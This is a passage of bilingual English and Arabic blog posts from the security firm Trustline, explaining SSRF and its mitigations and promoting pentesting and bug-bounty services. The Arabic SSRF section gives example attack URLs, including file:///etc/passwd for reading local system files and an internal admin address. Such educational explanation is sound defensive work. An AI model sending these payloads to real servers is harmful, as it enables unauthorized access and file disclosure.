The potential impact of this vulnerability was severe, as it could allow attackers to escalate their privileges and access sensitive data and services within GitHub&#39;s infrastructure. Fortunately, the issue was quickly identified and patched by GitHub&#39;s security team before any known malicious exploitation.

<h2>Preventing SSRF</h2>

Input Validation and Sanitization

<ul>
	<li>
	Whitelist URLs: Only allow requests to a predefined list of safe URLs or domains.
	</li>
	<li>Blacklist Dangerous Schemes: Block requests using potentially dangerous schemes like <code>file://</code>, <code>ftp://</code>, etc.</li>
	<li>URL Parsing and Validation: Thoroughly parse and validate user input to ensure it conforms to expected patterns.</li>
</ul>

Network Segmentation

<ul>
	<li>
	Isolation: Separate critical internal services from publicly accessible web applications. Limit the ability of web applications to make requests to internal networks.
	</li>
	<li>Firewall Rules: Implement strict firewall rules to control outbound traffic from your web server to internal networks.</li>
</ul>

Using Security Libraries and Tools

<ul>
	<li>
	SSRF Mitigation Libraries: Use libraries designed to mitigate SSRF risks. For example, libraries that validate and sanitize URLs before making requests.
	</li>
	<li>Web Application Firewalls (WAFs): Configure WAFs to detect and block SSRF attempts.</li>
</ul>

<h2 dir="rtl" style="text-align:right">فهم تزوير طلبات جانب الخادم (SSRF)&nbsp;</h2>

تزوير طلبات جانب الخادم (SSRF) هي ثغرة أمنية تتيح للهاكرز استغلال تطبيقات الويب لتنفيذ طلبات HTTP إلى مواقع غير مقصودة. غالبًا ما تؤدي هجمات SSRF إلى عواقب وخيمة مثل اختراق البيانات والوصول غير المصرح إليه للأنظمة الداخلية، مما يضع أمن المعلومات للمنظمة برمتها على المحك. تهدف هذه المدونة إلى تزويد خبراء الأمن السيبراني بشرح عميق لآلية عمل SSRF، مع تقديم أمثلة واقعية واستراتيجيات فعالة للتصدي لها.

<img alt="" src="/media/blog/2024/07/04/hacker_i0pQ6fS.png" style="height:236px; width:784px" />

<h2 dir="rtl" style="text-align:right">&nbsp;</h2>

<h2 dir="rtl" style="text-align:right">استغلال ثغرات SSRF: كيف يستغل الهاكرز تطبيقات الويب</h2>

تنشأ استغلالات SSRF عندما يعتمد تطبيق ويب على إدخال المستخدم لتحديد موقع ما وجلب البيانات منه. يستغل الهاكرز هذه الخاصية عن طريق حقن عناوين URL بحمولة خبيثة لخداع خادم الويب وإجباره على تنفيذ إجراءات غير مصرح بها، بما في ذلك:

<ul>
	<li dir="rtl" style="list-style-type:disc">
	اختراق الأنظمة الداخلية: عادةً لا تكون الخدمات الداخلية مثل قواعد البيانات وواجهات برمجة التطبيقات الداخلية متاحة للوصول العام عبر الإنترنت. إلا أن ثغرات SSRF يمكن أن تستغل الثقة بين الأنظمة على نفس الشبكة الداخلية، مما يسمح للمهاجم بالوصول غير المصرح إليه بهذه الموارد الحساسة. على سبيل المثال، يمكن للمهاجم استهداف عنوان URL مثل http://internal-service.local/admin الذي يخدع خادم الويب للكشف عن معلومات حساسة.
	</li>
	<li dir="rtl" style="list-style-type:disc">
	قراءة الملفات المحلية: في بعض الحالات، يمكن استغلال ثغرات SSRF لقراءة محتويات ملفات حساسة على خادم الويب نفسه. على سبيل المثال، يمكن للمهاجم تضمين عنوان URL مثل file:///etc/passwd لكشف بيانات المستخدم المخزنة.
	</li>
	<li dir="rtl" style="list-style-type:disc">مسح المنافذ ورسم خريطة الشبكة: باستخدام عناوين URL تحتوي على عناوين IP ومنافذ مختلفة، يستطيع الهاكرز رسم خريطة لأجهزة الشبكة الداخلية وتحديد أهداف أخرى محتملة للهجمات.</li>
</ul>

 
&nbsp;

<h2 dir="rtl" style="text-align:right">حادثة اختراق موقع جيت هاب عام (2020) - باستخدام ثغرة SSRF</h2>

كشفت خدمة GitHub Actions، وهي أداة رائجة للدمج المستمر والتنفيذ المستمر (CI/CD) لدى جيت هاب، عن ثغرة حرجة من نوع تزوير طلبات الجانب الخادم (SSRF) في مارس 2020. استغل الهاكرز هذه الثغرة الأمنية الخطيرة للتسلل إلى البنية التحتية الخاصة بجيت هاب، مع إمكانية الوصول المحتمل إلى بيانات حساسة.

استغلال ثغرة SSRF في GitHub Actions

<ul>
	<li dir="rtl" style="list-style-type:disc">انشاء ملف سير عمل خبيث: أنشأ الهاكرز ملف سير عمل مصمم خصيصًا لاستغلال ثغرة SSRF. تضمن هذا الملف خطوة لإجراء طلب HTTP إلى نقطة اتصال خاصة ببيانات خدمة AWS الداخلية، وهي خدمة الحوسبة السحابية من أمازون.</li>
	<li dir="rtl" style="list-style-type:disc">تنفيذ هجوم SSRF: عند تشغيل ملف سير العمل، استغلت التعليمات الخبيثة الثغرة الأمنية في خدمة GitHub Actions لإرسال طلب HTTP إلى نظام AWS الداخلي.</li>
	<li dir="rtl" style="list-style-type:disc">سرقة بيانات اعتماد AWS: بمجرد وصول الهاكرز إلى نقطة اتصال البيانات الداخلية، أصبح بإمكانهم الاستعلام عن معلومات حساسة، بما في ذلك بيانات اعتماد أدوار المستخدم المميز في AWS (AWS IAM) والتي تستخدم للوصول إلى موارد ومهام محددة ضمن البنية التحتية الخاصة بجيت هاب.</li>
</ul>

خطورة الثغرة وأهمية الاستجابة السريعة

كان من الممكن أن يترتب على استغلال ثغرة SSRF هذه عواقب وخيمة، حيث كان بإمكان الهاكرز تصعيد صلاحياتهم والوصول إلى موارد حساسة داخل جيت هاب. لحسن الحظ، تحرك فريق أمن جيت هاب بسرعة لتحديد الثغرة ومعالجتها من خلال تحديثات الأمان (Patch) قبل وقوع أي أضرار جسيمة.

&nbsp;

استراتيجيات فعالة للتصدي لـ SSRF وحماية تطبيقات الويب

لحسن الحظ، هناك عدة استراتيجيات يمكن اتباعها للتصدي لـ SSRF وتعزيز أمن تطبيقات الويب:

<ul>
	<li dir="rtl" style="list-style-type:disc">التحقق من صحة وتعقيم مدخلات المستخدم:

	<ul>
		<li dir="rtl" style="list-style-type:circle">قوائم عناوين URL الموثوقة: ينبغي تقييد خيارات المستخدم على قائمة محددة مسبقًا من عناوين URL أو النطاقات الآمنة التي تمت مراجعتها مسبقًا.</li>
		<li dir="rtl" style="list-style-type:circle">حظر البروتوكولات الخطرة: يجب حظر استخدام البروتوكولات التي يحتمل أن تكون خطرة في عناوين URL مثل file:// و ftp://.</li>
		<li dir="rtl" style="list-style-type:circle">فحص وتحليل عناوين URL: ينبغي إجراء فحص دقيق على إدخال المستخدم للتأكد من مطابقته للتنسيق الصحيح لمنع استغلاله لأغراض ضارة.</li>
	</ul>
	</li>
	<li dir="rtl" style="list-style-type:disc">تجزئة الشبكة:
	<ul>
		<li dir="rtl" style="list-style-type:circle">عزل الأنظمة الداخلية: يجب عزل الأنظمة والخدمات الداخلية عن تطبيقات الويب التي يمكن الوصول إليها بشكل عام. ينبغي تقييد قدرة تطبيقات الويب على الوصول إلى موارد الشبكة الداخلية.</li>
		<li dir="rtl" style="list-style-type:circle">قواعد جدار الحماية الصارمة: ينبغي تطبيق قواعد صارمة على جدار الحماية لمراقبة حركة المرور الصادرة من خادم الويب للشبكة الداخلية</li>
	</ul>
	</li>
	<li dir="rtl" style="list-style-type:disc">استخدام مكتبات وأدوات الأمان:
	<ul>
		<li dir="rtl" style="list-style-type:circle">مكتبات منع SSRF: يمكن الاستفادة من مكتبات الأمان المصممة خصيصًا لتخفيف مخاطر SSRF. تقوم هذه المكتبات بمهام مثل التحقق من صحة وتعقيم عناوين URL قبل تنفيذ أي طلبات.</li>
		<li dir="rtl" style="list-style-type:circle">جدران حماية تطبيقات الويب (WAFs): يلعب جدار حماية تطبيقات الويب دورًا رئيسيًا في اكتشاف ومنع محاولات استغلال ثغرات SSRF. ينبغي تكوين WAF بشكل صحيح للتعرف على أنماط حركة مرور SSRF المشبوهة وصدها.</li>
	</ul>
	</li>
</ul>

ثغرة ال Server-Side Request Forgery (SSRF)

Server-Side-Request-Forgery

Server-Side Request Forgery (SSRF) is a critical web security vulnerability that occurs when an attacker is able to make a server-side application send HTTP requests to an unintended location. SSRF attacks can be highly damaging, often leading to unauthorized access to internal systems, data leaks, and other severe security issues. This blog will explore the mechanics of SSRF, provide real-world examples, and offer strategies to mitigate this risk.

تزوير طلبات جانب الخادم (SSRF) هي ثغرة أمنية تتيح للهاكرز استغلال تطبيقات الويب لتنفيذ طلبات HTTP إلى مواقع غير مقصودة. غالبًا ما تؤدي هجمات SSRF إلى عواقب وخيمة مثل اختراق البيانات والوصول غير المصرح إليه للأنظمة الداخلية، مما يضع أمن المعلومات للمنظمة برمتها على المحك. تهدف هذه المدونة إلى تزويد خبراء الأمن السيبراني بشرح عميق لآلية عمل SSRF، مع تقديم أمثلة واقعية واستراتيجيات فعالة للتصدي لها.

Server-Side Request Forgery (SSRF)

<h2>Preparing for the Next Cyber Attack: How a Proactive Approach Can Protect Your Brand</h2>

In today&rsquo;s digital landscape, where cyber threats are becoming increasingly sophisticated and frequent, no company is immune from the risk of a cyberattack. A single breach can cause not only financial damage but also a significant hit to a company&rsquo;s reputation. In a market where trust is paramount, the fallout from a cyberattack can lead to a loss of customer confidence, legal liabilities, and long-term damage to your brand. The key to mitigating these risks lies in adopting a proactive cybersecurity strategy.

&nbsp;

<h2>The Importance of Proactive Cybersecurity</h2>

Proactive cybersecurity involves anticipating threats before they materialize, rather than merely reacting to them once they occur. This approach is about being one step ahead of cybercriminals, identifying vulnerabilities before they can be exploited, and implementing measures that reduce the likelihood of an attack. The benefits of this strategy are clear: companies that take a proactive stance are better prepared to defend against attacks and can recover more quickly if an incident does occur.

&nbsp;

<h2>How a Cyber Attack Can Impact Your Brand</h2>

A cyberattack can have devastating effects on a company&rsquo;s brand. The most immediate impact is the loss of customer trust. When sensitive data is compromised, customers feel betrayed, and this loss of trust can be difficult, if not impossible, to rebuild. Additionally, the media coverage that often accompanies a major breach can tarnish a company&rsquo;s image, leading to a negative perception that lingers long after the event. Legal consequences, including fines and lawsuits, further compound the damage, creating a cycle that can be hard to break.

In industries where competition is fierce, the reputational damage from a cyberattack can give competitors an advantage, as customers may seek out safer alternatives. In contrast, companies known for their strong cybersecurity measures are likely to attract and retain more customers, reinforcing their market position.

<h3>&nbsp;</h3>

<h2>Elements of a Proactive Cybersecurity Strategy</h2>

A proactive approach to cybersecurity is multifaceted, incorporating several key elements that work together to protect your brand:

<ol>
	<li>Regular Penetration Testing: Regularly testing your systems for vulnerabilities ensures that weaknesses are identified and addressed before they can be exploited. This ongoing assessment keeps your defenses strong and adaptable to emerging threats.</li>
	<li>Continuous Monitoring and Threat Intelligence: By continuously monitoring your network and staying informed about the latest threat intelligence, you can detect and respond to potential threats in real-time, minimizing the risk of a breach.</li>
	<li>Employee Training: Your employees are often the first line of defense against cyber threats. Regular training on security best practices and awareness of phishing tactics can prevent many common attacks.</li>
	<li>Incident Response Planning: Having a well-defined incident response plan in place ensures that if an attack does occur, your team knows exactly what steps to take to contain the breach, minimize damage, and restore normal operations.</li>
	<li>Third-Party Risk Management: Many cyberattacks occur through third-party vendors. By vetting and monitoring these partners, you can ensure they meet your security standards and do not introduce unnecessary risks.</li>
</ol>

&nbsp;

<h2>How Trustline Can Help Protect Your Brand</h2>

At Trustline, we understand the critical importance of protecting your brand from the damaging effects of a cyberattack. Our platform offers comprehensive solutions that support a proactive cybersecurity strategy, ensuring your company is well-equipped to defend against potential threats.

<ul>
	<li>Trustline Review: Our Secure Code Review as a Service is a continuous, cloud-based offering that combines automated tools with expert manual analysis to identify and mitigate vulnerabilities in your software code. This service not only enhances your security practices but also ensures compliance with industry standards. With Trustline Review, you can scope, schedule, and manage your code review process efficiently while collaborating with our network of background-checked, skills-vetted engineers who meticulously examine your source code for security flaws.</li>
	<li>Trustline Disclosure: Trustline Disclosure is our Vulnerability Disclosure Program (VDP), providing a structured method for reporting vulnerabilities in a secure and clear process. By implementing this program, you demonstrate your commitment to cybersecurity, building trust among your stakeholders and the wider community. Let everyone know how serious you are about security and take a proactive stance in elevating your cybersecurity posture.</li>
	<li>Trustline Bounty: Trustline Bounty is our Bug Bounty Program, offering financial incentives to ethical hackers who successfully identify and report vulnerabilities. This program allows companies to tap into the expertise of ethical hackers and security researchers, who continuously test your systems for flaws that may be overlooked by traditional security techniques. With ongoing security testing powered by hacker insights, you can enhance your system&#39;s defenses and stay ahead of emerging threats.</li>
	<li>Trustline Assessment: Trustline Assessment offers Pentest as a Service (PTaaS), a SaaS model approach for managing and coordinating penetration testing activities. Pentests involve authorized simulated cyberattacks conducted by skilled security professionals to identify and evaluate the severity of vulnerabilities within your organization&rsquo;s attack surface. PTaaS solutions allow you to scope, schedule, and manage your pentests through a SaaS-like platform, and match you with highly vetted testers. This timeboxed, methodology-driven activity helps ensure your systems are rigorously tested and fortified against potential attacks.</li>
</ul>

&nbsp;

Moreover, Trustline connects you with a network of our clients, allowing you to gain market recognition and showcase your commitment to security. By sharing your achievements and expertise, you can build trust with customers and stand out in a competitive market.

If you would like to keep up on the latest news, follow us on social media <a href="http://twitter.com/TrustlineSec">Twitter</a>, <a href="http://www.linkedin.com/company/trustlinesec/">LinkedIn</a>&nbsp;and <a href="mailto:info@trustline.sa">contact us</a> to Take the first step towards protecting your brand with a proactive cybersecurity strategy using the Trustline platform.

<h2>في عالمنا الرقمي اليوم، حيث تزداد التهديدات السيبرانية تعقيداً وتكراراً، لا توجد شركة محمية ضد خطر الهجمات السيبرانية. ولهذا السبب يمكن لأختراق واحد أن يسبب خسائر مالية كبيرة ويؤثر بشكل كبير على سمعة الشركة. في سوق تعتبر فيه الثقة امراً مهماً،&nbsp; يمكن للضرر الناتج عن الهجوم السيبراني أن يؤدي إلى فقدان ثقة العملاء بالعلامة التجارية، وفرض غرامات مالية قانونية، وإلحاق ضرر طويل الأمد بعلامتك التجارية. يكمن السر في تقليل هذه المخاطر في تبني استراتيجية أمن سيبراني استباقية.</h2>

<h3>&nbsp;</h3>

<h2>أهمية الأمن السيبراني الاستباقي</h2>

يتعلق الأمن السيبراني الاستباقي بتوقع التهديدات قبل أن تحدث، بدلاً من مجرد الاستجابة لها بعد حدوثها. يتعلق الأمر بأن تكون دائمًا متقدم بخطوة على المجرمين السيبرانيين، من خلال تحديد الثغرات قبل أن يتم استغلالها، وتنفيذ تدابير تقلل من احتمالية الهجمات السيبرانية. والفوائد من هذا النهج واضحة: الشركات التي تتخذ موقفاً استباقياً تكون أكثر استعدادًا للدفاع ضد الهجمات السيبرانية ويمكنها التعافي بشكل أسرع إذا حدثت مشكلة.

&nbsp;

<h2>كيف يمكن أن يؤثر الهجوم السيبراني على علامتك التجارية</h2>

يمكن أن يكون للهجوم السيبراني تأثيرات كارثية على علامة الشركة التجارية. التأثير الأكثر وضوحًا هو فقدان ثقة العملاء بالعلامة التجارية. عندما يتم اختراق البيانات الحساسة للمستخدمين والعملاء ، يشعرون بعدم الأمان وانعدام الثقة، وهذا الفقدان للثقة يمكن أن يكون من الصعب، إن لم يكن مستحيلاً، استعادته. بالإضافة إلى ذلك، يمكن للتغطية الإعلامية التي غالباً ما تصاحب حادثة سيبرانية كبيرة أن تشوه صورة الشركة، مما يؤدي إلى انطباع سلبي يستمر لفترة طويلة بعد الحدث. كما أن العواقب القانونية، بما في ذلك الغرامات والدعاوى القضائية، تزيد من تعقيد الضرر، مما يخلق دورة يصعب كسرها.

في الصناعات التي تشهد منافسة شديدة، يمكن للضرر الذي يلحق بالسمعة نتيجة للهجوم السيبراني أن يمنح المنافسين ميزة، حيث قد يلجأ العملاء إلى بدائل أكثر أمانًا. على النقيض من ذلك، من المرجح أن تجذب الشركات التي تشتهر بتدابيرها القوية في الأمن السيبراني المزيد من العملاء وتحافظ عليهم، مما يعزز من موقفها في السوق.

<h3>&nbsp;</h3>

<h2>عناصر استراتيجية الأمن السيبراني الاستباقية</h2>

تتضمن الاستراتيجية الاستباقية للأمن السيبراني عدة عناصر رئيسية تعمل معاً لحماية علامتك التجارية:

<ol>
	<li>اختبارات الاختراق الدورية: يضمن اختبار الأنظمة بشكل منتظم للكشف عن الثغرات معالجة الثغرات الأمنية قبل أن يتم استغلالها. يتيح هذا التقييم المستمر الحفاظ على قوة الدفاعات وتكيفها مع التهديدات الجديدة.</li>
	<li>المراقبة المستمرة ومعلومات التهديدات: من خلال المراقبة المستمرة لشبكتك والبقاء على اطلاع دائم بأحدث معلومات التهديدات، يمكنك اكتشاف والاستجابة للتهديدات السيبرانية المحتملة في الوقت الفعلي، مما يقلل من خطر حدوث أختراق سيبراني.</li>
	<li>تدريب الموظفين: غالبًا ما يكون الموظفون هم خط الدفاع الأول ضد التهديدات السيبرانية. يمكن للتدريب المنتظم على أفضل ممارسات الأمان وزيادة الوعي بتكتيكات التصيد الاحتيالي أن يمنع العديد من الهجمات الشائعة.</li>
	<li>تخطيط الاستجابة للحوادث: يضمن وجود خطة استجابة للحوادث محددة بوضوح أنه إذا حدث هجوم، يعرف فريقك بالضبط ما يجب القيام به لاحتواء الحادثة السيبرانية وتقليل الضرر واستعادة العمليات الطبيعية.</li>
	<li>إدارة مخاطر الطرف الثالث: تحدث العديد من الهجمات السيبرانية عبر بائعين من أطراف ثالثة. من خلال فحص هؤلاء الشركاء ومراقبتهم، يمكنك التأكد من أنهم يستوفون معايير واشتراطات الأمان الخاصة بك ولا يقدمون مخاطر غير ضرورية.</li>
</ol>

<h2>كيف يمكن لترست لاين أن تساعد في حماية علامتك التجارية</h2>

في ترست لاين، ندرك الأهمية الكبيرة لحماية علامتك التجارية من الآثار الضارة للهجوم السيبراني. توفر منصتنا حلولاً شاملة تدعم استراتيجية الأمن السيبراني الاستباقية، مما يضمن أن شركتك مجهزة جيدًا للدفاع ضد التهديدات المحتملة.

<ul>
	<li>ترست لاين ريفيو: خدمة مراجعة الأكواد البرمجية، هذه الخدمة تجمع بين الأدوات الآلية والتحليل اليدوي من قبل الخبراء لتحديد ومعالجة الثغرات الأمنية في مصدر الأكواد البرمجية لأصولك الرقمية. هذه الخدمة لا تعزز فقط ممارسات الأمان الخاصة بك، ولكنها تضمن أيضًا الامتثال للمعايير التنظيمية. مع ترست لاين ريفيو، يمكنك تحديد نطاق ومواعيد وإدارة عملية مراجعة مصدر الأكواد البرمجية الخاص بك بكفاءة، بالتعاون مع شبكتنا من المهندسين ذوي الكفاءات العالية الذين يفحصون أكوادك البرمجية بعناية للبحث عن الثغرات الأمنية.</li>
	<li>ترست لاين ديسكلوجر: ترست لاين ديسكلوجر هو برنامج الإفصاح عن الثغرات، الذي يوفر طريقة منظمة للهاكرز الأخلاقيين للإبلاغ عن الثغرات الي تتعلق بعلامتك التجارية بطريقة آمنة وواضحة. من خلال تنفيذ هذا البرنامج، يمكنك إثبات التزامك بالأمن السيبراني، وبناء الثقة بين أصحاب المصلحة والمجتمع بشكل عام.</li>
	<li>ترست لاين باونتي: ترست لاين باونتي هو برنامج مكافآت الثغرات الأمنية الخاص بنا، الذي يوفر حوافز مالية للهاكرز الأخلاقيين الذين ينجحون في تحديد والإبلاغ عن الثغرات الأمنية. يتيح هذا البرنامج للشركات الاستفادة من خبرات الهاكرز الأخلاقيين والباحثين في مجال الأمن السيبراني، الذين يقومون بشكل مستمر باختبار أنظمتك للعثور على العيوب التي قد لا تكتشفها التقنيات الأمنية التقليدية. من خلال الاختبار والتحليل المستمر للأمان بدعم من رؤى الهاكرز، يمكنك تعزيز دفاعات نظامك والبقاء متقدماً على التهديدات المتجددة.</li>
	<li>ترست لاين أسسمنت: يقدم ترست لاين أسسمنت اختبار الاختراق كخدمة، وهو نهج قائم على نموذج البرمجيات كخدمة لإدارة وتنسيق أنشطة اختبارات الاختراق. تشمل هذه الاختبارات محاكاة للهجمات السيبرانية التي يتم إجراؤها بواسطة محترفين مهرة في مجال الأمن السيبراني لتحديد وتقييم خطورة الثغرات في الأصول الرقمية لمؤسستك. نوفر حلول للعملاء من خلال اختيار مواعيد وإدارة اختبارات الاختراق الخاصة بهم، بالإضافة إلى ربطهم مع مختبرين أختراق ذوي كفاءات عالية. هذه الأنشطة المنهجية المحددة بوقت معين تضمن اختبار أنظمتك بشكل شامل وتعزيزها ضد الهجمات المحتملة.</li>
</ul>

&nbsp;

بالإضافة إلى ذلك، تربطك ترست لاين بشبكة من عملائنا، وإظهار التزامك بالأمان. من خلال مشاركة إنجازاتك وخبراتك، يمكنك بناء الثقة مع العملاء والتميز في سوق تنافسي.

انضم إلى ترست لاين اليوم،.

تابعونا على منصات التواصل الاجتماعي&nbsp;<a href="https://twitter.com/TrustlineSec">تويتر</a>، <a href="https://www.linkedin.com/company/trustlinesec/">لينكد ان</a>، لمعرفة آخر التحديثات و&nbsp;<a href="mailto:info@trustline.sa">تواصل معنا</a> واتخذ الخطوة الأولى نحو حماية علامتك التجارية من خلال استراتيجية أمن سيبراني أستباقية مع منصة ترست لاين

Preparing-for-the-Next-Cyber-Attack-How-a-Proactive-Approach-Can-Protect-Your-Brand

In today’s digital landscape, where cyber threats are becoming increasingly sophisticated and frequent, no company is immune from the risk of a cyberattack. A single breach can cause not only financial damage but also a significant hit to a company’s reputation. In a market where trust is paramount, the fallout from a cyberattack can lead to a loss of customers

في عالمنا الرقمي اليوم، حيث تزداد التهديدات السيبرانية تعقيداً وتكراراً، لا توجد شركة محمية ضد خطر الهجمات السيبرانية. ولهذا السبب يمكن لأختراق واحد أن يسبب خسائر مالية كبيرة ويؤثر بشكل كبير على سمعة الشركة. في سوق تعتبر فيه الثقة امراً مهماً،  يمكن للضرر الناتج عن الهجوم السيبراني أن يؤدي إلى فقدان ثقة العملاء بالعلامة التجارية، وفرض غرامات مالية قانونية، وإلحاق ضرر طويل.........

Preparing for the Next Cyber Attack How a Proactive Approach Can Protect Your Brand

الاستعداد للهجوم السيبراني القادم، كيف يمكن لنهج استباقي أن يحمي علامتك التجارية؟

Pentesting, also known as penetration testing, and bug bounty programs are two critical approaches employed to enhance security. Despite their common goal of identifying vulnerabilities, they operate differently and offer unique benefits. This exploration will delve into the essence of pentesting, its various methodologies, and how it contrasts with bug bounty programs, providing insight into how they can be effectively integrated into cybersecurity strategies.

&nbsp;

<h2>Understanding Pentesting and Its Operational Dynamics</h2>

Pentesting involves authorized attempts to penetrate and evaluate the security of a system to discover vulnerabilities. It combines human expertise and automated tools to scrutinize, penetrate, and assess a network through multiple strategies. The ultimate aim is to obtain full administrative access, revealing how deeply a system can be compromised.

&nbsp;

<h2>The Spectrum of Pentesting Approaches</h2>

Pentesting methodologies vary, each offering specific advantages. The landscape of pentesting has evolved from traditional methods to incorporate the talents of freelance security experts and cutting-edge software solutions. Selecting the right pentesting approach is crucial, ensuring it meets both compliance requirements and the expectation for comprehensive vulnerability discovery. The options include:

<ul>
	<li>Traditional Consultancy-Based Pentesting: Utilizes in-house or contracted experts to conduct tests.</li>
	<li>Trustline Assesment PTaaS: Leverages a global community of vetted security researchers for broader expertise.</li>
	<li>Automated Pentesting: Employs AI and machine learning to automate vulnerability scans.</li>
</ul>

<img alt="" src="/media/blog/2024/04/24/trustline-assessment.png" style="height:2969px; width:4411px" />

<h2>Choosing the Ideal Pentesting Method</h2>

When evaluating pentesting options based on effectiveness, efficiency, and value, community-driven PTaaS emerges as the leading choice. It offers a customized, cost-effective solution that meets specific organizational needs, providing thorough testing and detailed analyses for prompt and efficient assessments.

&nbsp;

<h2>Introducing Bug Bounty Programs</h2>

Bugbounty programs offer financial rewards to ethical hackers for identifying and reporting system vulnerabilities. These programs enable continuous security enhancement by engaging a wide community of security researchers, uncovering issues that automated tools might miss.

&nbsp;

<h2>Distinguishing Between Community-Driven Pentesting and Bug Bounties</h2>

Bug bounty programs excel in delivering long-term security improvements through a diverse pool of researchers, demonstrating cost-effectiveness and commitment from major corporations. Meanwhile, community-driven pentests provide immediate, detailed insights from a select group of experts, ideal for organizations needing quick results for compliance or stakeholder commitments.

&nbsp;

<h2>The Synergy of Pentesting and Bug Bounties in Cybersecurity</h2>

For a robust security posture, combining a comprehensive bug bounty program with targeted pentests is recommended. This dual approach leverages the vast expertise of ethical hackers for broad and in-depth security testing.

&nbsp;

<h2>Enhancing Your Security Strategy with Trustline</h2>

Whether initiating with a pentest or integrating a bug bounty for broader coverage, the advantages of both approaches are amplified when utilizing Trustline Attack Resistance platform. This SaaS solution offers real-time insights, advanced analytics, and a unified dashboard for managing the vulnerability lifecycle, from discovery to remediation. By harnessing both bounties and pentesting, organizations can achieve a balanced, proactive cybersecurity stance.

&nbsp;

<h2>How Trustline Can Help:</h2>

Trustline utilizes the community of hackers to help keep businesses safe by providing an all-in-one platform to perform continuous and comprehensive security testing. The platform takes a streamlined approach to finding and remediating bugs while supporting everything in a single dashboard. If you would like to keep up on the latest news, follow us on social media <a href="http://twitter.com/TrustlineSec" rel="noopener noreferrer" tabindex="0">Twitter</a>, <a href="http://www.linkedin.com/company/trustlinesec/" rel="noopener noreferrer" tabindex="0">LinkedIn</a>&nbsp;and <a href="https://www.trustline.sa/contact-us" rel="noopener noreferrer" tabindex="0"> Contact us</a> today if you are interested to know more.

يُعد اختبار الاختراق، المعروف أيضًا باسم الاختبار الأمني، وبرامج مكافآت الثغرات، من الأساليب الذكية المستخدمة لتحسين أمن الأنظمة. على الرغم من هدفهما المشترك في تحديد الثغرات الأمنية، إلا أنهما يعملان بشكل مختلف ويقدمان فوائد فريدة. سنناقش في هذا المقال جوهر اختبار الاختراق، ومنهجياته المختلفة، وكيف يختلف ويتقاطع مع برامج مكافآت الثغرات، وطرق فعالة حول كيفية دمجها بكفاءة عالية في استراتيجيات الأمن السيبراني.  

&nbsp;

<h2>فهم اختبار الاختراق وديناميكياته التشغيلية</h2>

يشتمل اختبار الاختراق على محاولات مصرحة مسبقاً لاختراق وتقييم أمن النظام لاكتشاف نقاط الضعف. فهو يجمع بين الخبرة البشرية والأدوات المؤتمتة للتدقيق والأختراق والتقييم من خلال استراتيجيات متعددة. والهدف النهائي هو الحصول على وصول إداري كامل، مما يكشف عن مدى العمق الذي يتم من خلاله اختراق النظام.

&nbsp;

<h2>اطياف من نهج اختبار الاختراق</h2>

تتباين منهجيات اختبار الاختراق، حيث يقدم كل منها مزايا محددة. تطور مجال اختبار الاختراق ليشمل مواهب خبراء الأمن المستقلين وحلول البرامج المتطورة. يعد اختيار نهج اختبار الاختراق الصحيح والمناسب أمرًا بالغ الأهمية، مما يضمن تلبية كل من متطلبات الامتثال وتوقعات اكتشاف شامل لنقاط الضعف. وتشمل الخيارات ما يلي:

<ul>
	<li>اختبار اختراق تقليدي: يستخدم خبراء داخليين أو متعاقدين لإجراء الاختبارات.</li>
	<li>ترست لاين&nbsp;اختراق كخدمة قائم على المجتمع: يستفيد من مجتمع عالمي من الباحثين الأمنيين الموثوقين للحصول على خبرة أوسع.</li>
	<li>اختبار اختراق آلي: يستخدم الذكاء الاصطناعي والتعلم الآلي لأتمتة عمليات الكشف عن الثغرات الأمنية.</li>
</ul>

<img alt="" src="/media/blog/2024/04/24/trustline-assessment_DNvTtqy.png" style="height:2969px; width:4411px" />

<h2>اختيار الطريقة الأمثل لاختبار الاختراق</h2>

عند تقييم خيارات اختبار الاختراق بناءً على الفعالية والكفاءة والقيمة، يبرز اختبار الاختراق كخدمة قائمة على المجتمع كخيار رائد. فهو يوفر حلاً مخصصًا وفعالًا من حيث التكلفة يلبي احتياجات المؤسسة المحددة، ويوفر اختبارًا شاملًا وتحليلات تفصيلية لتقييمات سريعة وفعالة.

&nbsp;

<h2>برامج مكافآت الثغرات الأمنية</h2>

تقدم برامج مكافآت الثغرات الأمنية مكافآت مالية للباحثين الأمنيين، لاكتشاف نقاط ضعف النظام والإبلاغ عنها. تمكن هذه البرامج من تعزيز الأمن بشكل مستمر من خلال إشراك مجموعة واسعة من الباحثين الأمنيين، مما يكشف عن المشكلات التي قد لا يتم رصدها من قبل الأدوات المؤتمتة .

&nbsp;

<h2>الفرق بين اختبار الاختراق المجتمعي وبرامج مكافآة الثغرات </h2>

تتفوق برامج المكافآت الأمنية في تقديم تحسينات أمنية طويلة الأجل من خلال مجموعة متنوعة من الباحثين، مما يدل على فعالية التكلفة والالتزام من قبل الشركات الكبرى. وفي الوقت نفسه، توفر اختبارات الاختراق المجتمعية رؤى فورية ومفصلة من مجموعة مختارة من الخبراء، وهي مثالية للمؤسسات التي تحتاج إلى نتائج سريعة للامتثال أو التزامات أصحاب المصلحة.

&nbsp;

<h2>الدمج بين اختبار الاختراق وبرامج مكافآت الثغرات الأمنية في الأمن السيبراني</h2>

للحصول على أفضل نتيجة أمنية، يوصى بدمج برنامج مكافآت الثغرات الأمنية واجراء اختبارات الأختراق المستهدفة. هذا النهج المزودج ينعكس ايجابيا على أمن الأصول الرقمية من خلال الاستفادة الكاملة من خبرة الباحثين الواسعة.

&nbsp;

<h2>عزز من استراتيجية الأمان الخاصة بك مع ترست لاين</h2>

سواءً بدأت باختبار الأختراق او دمجها مع برامج مكافأة الثغرات الأمنية لتغطية أوسع, فإن مزايا كلا النهجين تتضاعف عند استخدام منصة ترست لاين لمقاومة الهجمات فالمنصة تقدم حل قائم من التحليلات المتقدمة ولوحة التحكم الموحدة لإدارة دورة حياة الثغرات الأمنية، من مرحلة لاكتشاف إلى مرحلة المعالجة. من خلال الاستفادة من كل من مزايا برامج المكافآت واختبارات الاختراق، يمكن للمؤسسات تحقيق موقف أمني استباقي ومتوازن.

&nbsp;

<h2>كيف ترست لاين تساعدك :  </h2>

